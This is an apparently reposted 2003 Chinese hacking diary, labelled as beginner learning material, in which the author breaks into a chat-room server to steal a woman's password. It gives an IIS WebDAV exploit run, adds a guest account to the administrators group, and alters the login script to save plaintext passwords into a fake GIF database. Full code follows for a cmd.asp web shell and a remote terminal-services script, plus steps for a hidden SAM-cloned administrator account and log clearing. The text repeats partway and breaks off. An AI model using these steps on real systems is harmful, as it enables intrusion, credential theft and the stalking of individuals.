***日记(荐)
注釋:原創于2003年! 時間是長了點,可以學習里面一點東西! 閱讀人群:網絡安全初學者
? ?? ?? ?? ?? ?***日記一則
? ?真不知道她現在過的怎么樣,不過作為朋友,還是應該關心一下她的QQ上到底有哪些色狼,所以決定盜她
的QQ密碼.呵呵..好吧,現在切入正題,得到密碼通常的方案有如下幾種:
1.直接***騰訊服務器 (瘋子)
2.在網吧安一個***,再騙她去上網,呵呵...... (唉,好象她從來沒有和我單獨在一起過,明顯討厭我
由于普通用戶的EMAIL.QQ.聊天室密碼(包括江湖) 大多一樣,或者有簡易變形,而聊天室,江湖網絡較
Tencent網絡脆弱,因此,又可以有以下幾種方案:
3.WEB破解郵箱密碼 (她沒有mail...)
4.網絡欺騙,在自己的網站上安裝聊天室,叫她來上網 (可惜我沒有網站)
5.通過對聊天室以及江湖服務器的***,來獲得目標的密碼.
看來現在只有***網站,目標鎖定為 xajh.xxx.com
c:\>inging xajh.xxx.com [192.168.0.1] with 32 bytes of da
Reply from 192.168.0.1: bytes=32 time=111ms TTL=125
Reply from 192.168.0.1: bytes=32 time=102ms TTL=125
Reply from 192.168.0.1: bytes=32 time=99ms TTL=125
Reply from 192.168.0.1: bytes=32 time=96ms TTL=125
Ping statistics for 192.168.0.1:
? ?Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
? ?Minimum = 96ms, Maximum = 111ms, Average = 102ms
//得到對方IP為 192.168.0.1
C:\>telnet 192.168.0.1 80
GET [Enter]
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 16 Apr 2003 11:18:38 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter is incorrect. </body>
</html>
失去了跟主機的連接。
原來是Windows 2000,恩,試試Webdavx漏洞,到[url]www.xfocus.net[/url] 下了isno寫的 Webdavx3.rar
//Server: Microsoft-IIS/5.0 說明是windows 2000 如果是5.1 是xp ,4.0 是nt
C:\>webdavx3 192.168.0.1
IIS WebDAV overflow remote exploit by [email]isno@xfocus.org[/email]
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
try offset: 4
try offset: 5
try offset: 6
try offset: 7
try offset: 8
try offset: 9
try offset: 10
try offset: 11
try offset: 12
try offset: 13
try offset: 14
try offset: 15
try offset: 16
try offset: 17
try offset: 18
try offset: 19
try offset: -1
try offset: -2
try offset: -3
waiting for iis restart....................... (IIS在這里重起了,等一會)
try offset: -4??
//程序運行到這里停頓下來了,再開一個CMD,
C:\>telnet 192.168.0.1 7788
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.1] 7788 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>net user guest /active:y //激活guest帳戶
命令成功完成。
C:\WINNT\system32>net user guest password123 //設置guest帳戶密碼為password123
命令成功完成。
C:\WINNT\system32>net localgroup administrators guest /add //將guest帳戶加到administrators組
命令成功完成。
看看3389開了沒有
C:\>telnet 192.168.0.1 3389
GET [Enter]
_ //看到了等待符,說明開了.
很好,用終端服務客戶端連上對方計算機,打開"管理工具"->"計算機管理"->"服務和應用程序"->點
擊"Internet 信息服務" ,發現系統長時間沒有反應..
??//在這里可以方便的知道對方WEB程序的物理路徑
C:\>telnet 192.168.0.1 80
正在連接到192.168.0.1...不能打開到主機的連接, 在端口 80.
由于目標機器積極拒絕,無法連接。
??//不能連接80端口,說明Webdavx溢出成功后,使IIS死掉了.
先不管它,打開"搜索",查找一切有"xajh"字樣的文件.
??//找WEB程序物理路徑的另一方法,除此以外還有命令行中的 dir/s 等
終于找到了,物理路徑為d:\www\xajh\ .找到江湖的說明文件d:\www\xajh\說明文件.txt,發現江湖的數據庫
為c:\www\xajh\h3cw\hc3w_xajh.asp,將其復制一個為 d:\www\xajh\error.mdb.
回到自己的機子上下載 [url]http://xajh.xxx.com/error.mdb[/url],打開一看,竟然只有1MB!? 看來被改過了,重新連接
192.168.0.1的終端服務,發現d:\www\xajh\h3cs\zjh595.asp這個文件有13.6MB ,應該是它了吧,于是復制為
d:\www\xajh\error1.mdb,然后回到自己的機子上下載[url]http://xajh.xxx.com/error1.mdb[/url]
下載完后,應該馬上刪除[url]http://xajh.xxx.com/error.mdb[/url] 和[url]http://xajh.xxx.com/error1.mdb[/url] 以免引起網
管注意.打開一看,竟然沒有給access數據庫加密碼,呵呵.....!!! 再一看,咦,怎么所有的用戶的密碼都這樣
復雜",查看d:\www\xajh\說明文件.txt 知道原來其用了MD5加密(現在的聊天室大多這樣).由于暴力破解的困
難性,想到了使用嗅探器,但是嗅探器會占用大量帶寬,還是容易引起有經驗的管理員懷疑,于是決定使用WEB欺
騙,注意到剛才已經使IIS死了,需要重啟IIS.//
c:\>net start w3svc
提示因未知原因服務不能啟動
看來只有重新啟動計算機了.這里需要考慮到重新啟動后,3389是否會開啟(通常情況下,IIS會自動啟動,但是
終端服務可能會關閉)
法一:
打開"控制面板"->"管理工具"->"服務"
找到 "Terminal Services" 雙擊,將"啟動類型"改為"自動"
找到 "World Wide Web Publishing" 雙擊,看是否為"自動"
若均為"自動" 重啟計算機后,IIS和終端服務都會自動啟動.
法二:
打開共享,具體請參看iqst的<<一份詳盡的IPC$***資料>>
c:\>net share
沒有啟動 Server 服務。
是否可以啟動? (Y/N) [Y]: y
Server 服務正在啟動 .
Server 服務已經啟動成功。
共享名??資源? ?? ?? ?? ?? ? 注釋
-----------------------------------------------------
IPC$? ?? ?? ?? ?? ?? ?? ?? ?? ? 遠程 IPC
D$? ?? ???D:\? ?? ?? ?? ?? ?? ???默認共享
G$? ?? ???G:\? ?? ?? ?? ?? ?? ???默認共享
F$? ?? ???F:\? ?? ?? ?? ?? ?? ???默認共享
ADMIN$? ???D:\WINDOWS? ?? ?? ?? ?? ?遠程管理
C$? ?? ???C:\? ?? ?? ?? ?? ?? ???默認共享
E$? ?? ???E:\? ?? ?? ?? ?? ?? ???默認共享
運用腳本打開終端服務,具體請參看caozhe(草哲)的<<一次簡單的3389***過程>>
c:\>cscript rots.vbe 192.168.0.1 guest "password123" 3389 /fr
等待幾分鐘后,系統重啟......
好了,現在回到正題,目標是江湖密碼,但是它使用了md5加密,因此需要使用WEB欺騙,于是先用access建了一個
xajhlogo.mdb 數據庫表為"用戶密碼",有三個段分別為"用戶名","密碼","oicq",然后修改為xajhlogo.gif.
自己的機子上開一ftp服務(可用tftp32) 在對方機子上
c:\>tftp -i 127.0.0.1 get xajhlogo.gif xajhlogo.gif //127.0.0.1為我的IP
然后復制到 c:\www\xajh\p_w_picpaths\xajhlogo.gif //減小可能被管理員懷疑的危險系數
然后開始動手修改程序d:\www\xajh\check.asp 此文件為這個版本的江湖的校驗文件.我修改后的內容如下
.........
name=Trim(Request("name"))
password=Trim(Request("pass"))
'上面是原來就有的
.........
Set conn=Server.CreateObject("ADODB.CONNECTION")
Set rs=Server.CreateObject("ADODB.RecordSet")
conn.open Application("sjjh_usermdb")
password1=md5(password)
sql="SELECT * FROM 用戶 WHERE 姓名='"&name&"'"
rs.open sql,conn,2,2
if rs.Eof and rs.Bof then
? ?rs.close
? ?set rs=nothing
? ?conn.close
? ?set conn=nothing
? ?? ?Response.Redirect "error.asp?id=423"
? ?response.end
end if
if rs("密碼")<>password1 then
? ?rs.close
? ?set rs=nothing
? ?conn.close
? ?set conn=nothing
? ?? ?Response.Redirect "error.asp?id=141"
? ?response.end
end if
'這一段其實是我修改了原來的江湖程序直接粘在這兒的,懶" 不過需要注意到這里要用"password1" 不然后
面'的密碼驗證的時候將成為 password=md5(md5(password)) ,這樣就出錯了.
useroicq=rs("oicq")
? ?? ?rs.close
? ?? ?set rs=nothing
? ?? ?conn.close
? ?set conn=nothing
set conn=Server.CreateObject("ADODB.Connection")
DBPath=Server.MapPath("p_w_picpaths/xajhlogo.gif")
Set rs=Server.CreateObject("ADODB.RecordSet")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
rs.open "SELECT * FROM 用戶密碼 WHERE 用戶名='" & name & "'",conn
If not(Rs.Bof OR Rs.Eof) Then
sql="Update 用戶密碼 Set 密碼='" & password & "'" & "where 用戶名='" & name & "'"
conn.Execute sql
rs.close
set rs=nothing
conn.close
set conn=nothing? ?? ???
else
sql="Insert Into 用戶密碼 (用戶名,密碼,oicq) Values("
sql=sql & "'" & name & "'" & ","
sql=sql & "'" & password & "'" & ","
sql=sql & "'" & useroicq & "'" & ")"
conn.Execute sql
rs.close
set rs=nothing
conn.close
set conn=nothing
end if
.............
'我上面加的程序都是在對方操作江湖數據庫之前的,這樣是為了防止同時操作兩個數據庫時出錯
'下面就是對方第一段開始操作數據庫的程序
'由于大家都是菜鳥,所以一點經驗之談就是,先在自己機子上測試好了,再傳!!!
Set conn=Server.CreateObject("ADODB.CONNECTION")
Set rs=Server.CreateObject("ADODB.RecordSet")
conn.open Application("sjjh_usermdb")
.........
至此,漫長的等待開始了............
15 道數學題過后
.........
現在激動人心的時刻到來了,下載 .
改為 1.mdb 打開之后...........找到了她----- *** 的密碼,哈哈,她的密碼果然和QQ密碼一樣^O^
經過測試(前100個密碼,實有1237個用戶密碼), 竟然有5個人的QQ密碼和江湖密碼一樣(由于用戶的QQ號可能
是亂填,因此可能更多,最好的辦法,跟他們聊聊問問QQ號),對QQ密碼的重視程度看來也不是很大,估計也沒
有申請密碼保護,試了試,有2個人沒有申請,呵呵.........開心吧
至此,既高興又傷心,高興的是我得到了她的密碼,傷心的是有N多的互聯網用戶對密碼的重視程度或者密碼安
全意識薄弱(有的密碼很復雜,但是QQ密碼和聊天室密碼仍然一樣),還好,我不是戀Q狂^-^
好,現在是后門,安一個cmd.asp 到 d:\www\xajh\p_w_picpaths\config.asp.
代碼見附錄,可以通過[url]http://xajh.xxx.com/p_w_picpaths/config.asp[/url] 執行WEB命令
大家一定注意到我沒有使用克隆的管理員帳號,是因為由于克隆的管理員帳員都使用了同樣的profiles,因此
如果你不小心留了點什么記錄(比如有些人喜歡在運行那打命令),那樣會很容易引起管理員發現.因此慎用克
隆的管理員帳號,但還是應該建立一個隱藏的管理員帳號作為后門.
先建立 InternetUser$ 用戶
c:\>net user InternetUser$ password123 /add
//后面加$ 是為了使在 控制臺下用 net user 看不到.
然后運行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 點擊它 ,然后在菜單"安全"->"權限" 添加自己現在登錄的帳戶或組,
把"權限"->"完全控制"->"允許"打上勾,然后確定.
(比如剛才我們用guest登錄,但它已經是administrators組的了,因此需要把ADMINISTRATORS組的也改為允許
完全控制,而且下面的鍵,Domains,account,user都要逐級這樣做.但如果前面沒有更改guest用戶的默認組,這
里就沒必要這么麻煩,一級一級的了)這樣就可以直接讀取本地sam的信息
現在運行regedit.exe
打開鍵 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\InternetUser$
查看默認鍵值為"0x3f1" 相應導出如下
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\ASPNET$ 為InternetUser$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 為 3f1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 為 lf4.reg (Administrators的相應鍵)
用記事本打開lf4.reg 找到如下的"F"的值,比如這個例子中如下
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
??00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
??f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
??00,00,00,00,00,00,00
把其復制后,打開3f1.reg,找到"F"的值,將其刪除,然后把上面的那段粘貼.
打開aspnet$.reg,把里面的內容,比如這個例子中如下面這段復制
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$]
@=hex(3f1):
回到3f1.reg 粘貼上面這段到文件最后,最后生成的文件內容如下
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
??00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
??f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
??00,00,00,00,00,00,00
"V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\
??00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\
??14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\
??01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\
??00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\
??00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\
??08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\
??00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\
??00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\
??00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
??00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
??00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\
??00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\
??00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\
??00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\
??e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\
??00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\
??00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\
??4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\
??76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\
??ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\
??fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\
??37,f1,02,cf,01,00,01,00,01,00,01,00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$]
@=hex(3f1):
保存后,將InternetUser$用戶刪除
c:\>net user InternetUser$ /delete
運行regedit.exe 將我們已經修改好的3f1.reg文件導入.
最后,打開regedt32.exe 找到HKEY_LOCAL_MAICHINE\SAM\SAM 點擊它 ,然后在菜單"安全"->"權限" 刪除剛才
添加的用戶(比如剛才剛才是用的guest,而且改了Administrators組的設置,所以與前面對應,Administratos
組也要改,而且SAM下面的鍵,Domains,account,user都要逐級這樣做,但如果前面沒有改guest用戶的默認組,
這里沒必要這么麻煩,一級一級的了).
這樣,我們就建立了一個在控制臺用 net user 和"計算機管理"中都看不到的帳戶InternetUser$,但是不能改
密碼,一改密碼就會在"計算機管理"中看到.需要注意的一點是,每次登錄(不論是不是克隆的),都最好注銷掉,
而不是直接關閉窗口,否則在"終端服務管理器"中會看到,而且管理員登錄后注銷時,可能會發現一個問題就是
,怎么會是"注銷InternetUser$..."!!! (我克隆了兩個帳號,測試的,沒有測試過Administrators)
然后是記錄清理,由于整個過程有下載的過程被記錄,因此,運行logfiles,刪除相關文件中的記錄即可.
本人水平糟糕,一定有錯誤和遺漏的地方,這文都改了N次,所以望高手批評指正.
附錄:
--------------------------------------------------
以下是asp后門,存為 cmd.asp
<%@ Language=VBScript %>
<%
??Dim oScript
??Dim oScriptNet
??Dim oFileSys, oFile
??Dim szCMD, szTempFile
??On Error Resume Next
??' -- create the COM objects that we will be using -- '
??Set oScript = Server.CreateObject("WSCRIPT.SHELL")
??Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
??Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
??' -- check for a command that we have posted -- '
??szCMD = Request.Form(".CMD")
??If (szCMD <> "") Then
? ? ' -- Use a poor man's pipe ... a temp file -- '
? ? szTempFile = "C:\" & oFileSys.GetTempName( )
? ? Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
? ? Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
??End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="OST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<RE>
<%
??If (IsObject(oFile)) Then
? ? ' -- Read the output from our command and remove the temp file -- '
? ? On Error Resume Next
? ? Response.Write Server.HTMLEncode(oFile.ReadAll)
? ? oFile.Close
? ?Call oFileSys.DeleteFile(szTempFile, True)
??End If
%>
</BODY>
</HTML>
----------------------------------------------------------------------
以下是開終端的腳本,引自caozhe(草哲) 的<<一次簡單的3389***過程 >>,把它存為rots.vbe
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
if (lcase(right(wscript.fullname,11))="wscript.exe") then
??set objShell=wscript.createObject("wscript.shell")
??objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
??wscript.quit
end if
if wscript.arguments.count<3 then
??usage()
??wscript.echo "Not enough parameters."
??wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
??port=wscript.arguments(3)
else
??port=3389
end if
if not isnumeric(port) or port<1 or port>65000 then
??wscript.echo "The number of port is error."
??wscript.quit
end if
if wscript.arguments.count>4 then
??reboot=wscript.arguments(4)
else
??reboot=""
end if
usage()
outstreem.write "Conneting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
??if instr(objinstoscaption.caption,"Server")>0 then
? ? wscript.echo "OK!"
??else
? ? wscript.echo "OS type is "&objinstoscaption.caption
? ? outstreem.write "Do you want to cancel setup?[y/n]"
? ? strcancel=instreem.readline
? ? if lcase(strcancel)<>"n" then wscript.quit
??end if
next
outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get
("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-
Tcp","ortNumber",port
end with
showerror(err.number)
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
??outstreem.write "Now, reboot target...."
??strwqlquery="select * from win32_operatingsystem where primary='true'"
??set colinstances=objswbemservices.execquery(strwqlquery)
??for each objinstance in colinstances
? ? objinstance.win32shutdown(flag)
??next
??showerror(err.number)
else
??wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"
function showerror(errornumber)
if errornumber Then
??wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
??if err.description <> "" then
? ? wscript.echo "Error description: "&err.description&"."
??end if
??wscript.quit
else
??wscript.echo "OK!"
end if
end function
function usage()
wscript.echo string(79,"*")
wscript.echo "ROTS v1.05"
wscript.echo "Remote Open Terminal services Script, by 草哲"
wscript.echo "Welcome to visite [url]www.5458.net[/url]"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
wscript.echo "port: default number is 3389."
wscript.echo "/r: auto reboot target."
wscript.echo "/fr: auto force reboot target."
wscript.echo string(79,"*")&vbcrlf
end function
root注:本文對于網絡安全初學者而言,或許會有幫助,雖然采用的方法比較簡單,但有助于了解***者的思路和方法流程,當然,不是鼓勵大家這么干
? ?? ?? ?? ?? ?***日記一則
? ?真不知道她現在過的怎么樣,不過作為朋友,還是應該關心一下她的QQ上到底有哪些色狼,所以決定盜她
的QQ密碼.呵呵..好吧,現在切入正題,得到密碼通常的方案有如下幾種:
1.直接***騰訊服務器 (瘋子)
2.在網吧安一個***,再騙她去上網,呵呵...... (唉,好象她從來沒有和我單獨在一起過,明顯討厭我
由于普通用戶的EMAIL.QQ.聊天室密碼(包括江湖) 大多一樣,或者有簡易變形,而聊天室,江湖網絡較
Tencent網絡脆弱,因此,又可以有以下幾種方案:
3.WEB破解郵箱密碼 (她沒有mail...)
4.網絡欺騙,在自己的網站上安裝聊天室,叫她來上網 (可惜我沒有網站)
5.通過對聊天室以及江湖服務器的***,來獲得目標的密碼.
看來現在只有***網站,目標鎖定為 xajh.xxx.com
c:\>inging xajh.xxx.com [192.168.0.1] with 32 bytes of da
Reply from 192.168.0.1: bytes=32 time=111ms TTL=125
Reply from 192.168.0.1: bytes=32 time=102ms TTL=125
Reply from 192.168.0.1: bytes=32 time=99ms TTL=125
Reply from 192.168.0.1: bytes=32 time=96ms TTL=125
Ping statistics for 192.168.0.1:
? ?Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
? ?Minimum = 96ms, Maximum = 111ms, Average = 102ms
//得到對方IP為 192.168.0.1
C:\>telnet 192.168.0.1 80
GET [Enter]
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 16 Apr 2003 11:18:38 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter is incorrect. </body>
</html>
失去了跟主機的連接。
原來是Windows 2000,恩,試試Webdavx漏洞,到[url]www.xfocus.net[/url] 下了isno寫的 Webdavx3.rar
//Server: Microsoft-IIS/5.0 說明是windows 2000 如果是5.1 是xp ,4.0 是nt
C:\>webdavx3 192.168.0.1
IIS WebDAV overflow remote exploit by [email]isno@xfocus.org[/email]
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
try offset: 4
try offset: 5
try offset: 6
try offset: 7
try offset: 8
try offset: 9
try offset: 10
try offset: 11
try offset: 12
try offset: 13
try offset: 14
try offset: 15
try offset: 16
try offset: 17
try offset: 18
try offset: 19
try offset: -1
try offset: -2
try offset: -3
waiting for iis restart....................... (IIS在這里重起了,等一會)
try offset: -4??
//程序運行到這里停頓下來了,再開一個CMD,
C:\>telnet 192.168.0.1 7788
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.1] 7788 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>net user guest /active:y //激活guest帳戶
命令成功完成。
C:\WINNT\system32>net user guest password123 //設置guest帳戶密碼為password123
命令成功完成。
C:\WINNT\system32>net localgroup administrators guest /add //將guest帳戶加到administrators組
命令成功完成。
看看3389開了沒有
C:\>telnet 192.168.0.1 3389
GET [Enter]
_ //看到了等待符,說明開了.
很好,用終端服務客戶端連上對方計算機,打開"管理工具"->"計算機管理"->"服務和應用程序"->點
擊"Internet 信息服務" ,發現系統長時間沒有反應..
??//在這里可以方便的知道對方WEB程序的物理路徑
C:\>telnet 192.168.0.1 80
正在連接到192.168.0.1...不能打開到主機的連接, 在端口 80.
由于目標機器積極拒絕,無法連接。
??//不能連接80端口,說明Webdavx溢出成功后,使IIS死掉了.
先不管它,打開"搜索",查找一切有"xajh"字樣的文件.
??//找WEB程序物理路徑的另一方法,除此以外還有命令行中的 dir/s 等
終于找到了,物理路徑為d:\www\xajh\ .找到江湖的說明文件d:\www\xajh\說明文件.txt,發現江湖的數據庫
為c:\www\xajh\h3cw\hc3w_xajh.asp,將其復制一個為 d:\www\xajh\error.mdb.
回到自己的機子上下載 [url]http://xajh.xxx.com/error.mdb[/url],打開一看,竟然只有1MB!? 看來被改過了,重新連接
192.168.0.1的終端服務,發現d:\www\xajh\h3cs\zjh595.asp這個文件有13.6MB ,應該是它了吧,于是復制為
d:\www\xajh\error1.mdb,然后回到自己的機子上下載[url]http://xajh.xxx.com/error1.mdb[/url]
下載完后,應該馬上刪除[url]http://xajh.xxx.com/error.mdb[/url] 和[url]http://xajh.xxx.com/error1.mdb[/url] 以免引起網
管注意.打開一看,竟然沒有給access數據庫加密碼,呵呵.....!!! 再一看,咦,怎么所有的用戶的密碼都這樣
復雜",查看d:\www\xajh\說明文件.txt 知道原來其用了MD5加密(現在的聊天室大多這樣).由于暴力破解的困
難性,想到了使用嗅探器,但是嗅探器會占用大量帶寬,還是容易引起有經驗的管理員懷疑,于是決定使用WEB欺
騙,注意到剛才已經使IIS死了,需要重啟IIS.//
c:\>net start w3svc
提示因未知原因服務不能啟動
看來只有重新啟動計算機了.這里需要考慮到重新啟動后,3389是否會開啟(通常情況下,IIS會自動啟動,但是
終端服務可能會關閉)
法一:
打開"控制面板"->"管理工具"->"服務"
找到 "Terminal Services" 雙擊,將"啟動類型"改為"自動"
找到 "World Wide Web Publishing" 雙擊,看是否為"自動"
若均為"自動" 重啟計算機后,IIS和終端服務都會自動啟動.
法二:
打開共享,具體請參看iqst的<<一份詳盡的IPC$***資料>>
c:\>net share
沒有啟動 Server 服務。
是否可以啟動? (Y/N) [Y]: y
Server 服務正在啟動 .
Server 服務已經啟動成功。
共享名??資源? ?? ?? ?? ?? ? 注釋
-----------------------------------------------------
IPC$? ?? ?? ?? ?? ?? ?? ?? ?? ? 遠程 IPC
D$? ?? ???D:\? ?? ?? ?? ?? ?? ???默認共享
G$? ?? ???G:\? ?? ?? ?? ?? ?? ???默認共享
F$? ?? ???F:\? ?? ?? ?? ?? ?? ???默認共享
ADMIN$? ???D:\WINDOWS? ?? ?? ?? ?? ?遠程管理
C$? ?? ???C:\? ?? ?? ?? ?? ?? ???默認共享
E$? ?? ???E:\? ?? ?? ?? ?? ?? ???默認共享
運用腳本打開終端服務,具體請參看caozhe(草哲)的<<一次簡單的3389***過程>>
c:\>cscript rots.vbe 192.168.0.1 guest "password123" 3389 /fr
等待幾分鐘后,系統重啟......
好了,現在回到正題,目標是江湖密碼,但是它使用了md5加密,因此需要使用WEB欺騙,于是先用access建了一個
xajhlogo.mdb 數據庫表為"用戶密碼",有三個段分別為"用戶名","密碼","oicq",然后修改為xajhlogo.gif.
自己的機子上開一ftp服務(可用tftp32) 在對方機子上
c:\>tftp -i 127.0.0.1 get xajhlogo.gif xajhlogo.gif //127.0.0.1為我的IP
然后復制到 c:\www\xajh\p_w_picpaths\xajhlogo.gif //減小可能被管理員懷疑的危險系數
然后開始動手修改程序d:\www\xajh\check.asp 此文件為這個版本的江湖的校驗文件.我修改后的內容如下
.........
name=Trim(Request("name"))
password=Trim(Request("pass"))
'上面是原來就有的
.........
Set conn=Server.CreateObject("ADODB.CONNECTION")
Set rs=Server.CreateObject("ADODB.RecordSet")
conn.open Application("sjjh_usermdb")
password1=md5(password)
sql="SELECT * FROM 用戶 WHERE 姓名='"&name&"'"
rs.open sql,conn,2,2
if rs.Eof and rs.Bof then
? ?rs.close
? ?set rs=nothing
? ?conn.close
? ?set conn=nothing
? ?? ?Response.Redirect "error.asp?id=423"
? ?response.end
end if
if rs("密碼")<>password1 then
? ?rs.close
? ?set rs=nothing
? ?conn.close
? ?set conn=nothing
? ?? ?Response.Redirect "error.asp?id=141"
? ?response.end
end if
'這一段其實是我修改了原來的江湖程序直接粘在這兒的,懶" 不過需要注意到這里要用"password1" 不然后
面'的密碼驗證的時候將成為 password=md5(md5(password)) ,這樣就出錯了.
useroicq=rs("oicq")
? ?? ?rs.close
? ?? ?set rs=nothing
? ?? ?conn.close
? ?set conn=nothing
set conn=Server.CreateObject("ADODB.Connection")
DBPath=Server.MapPath("p_w_picpaths/xajhlogo.gif")
Set rs=Server.CreateObject("ADODB.RecordSet")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
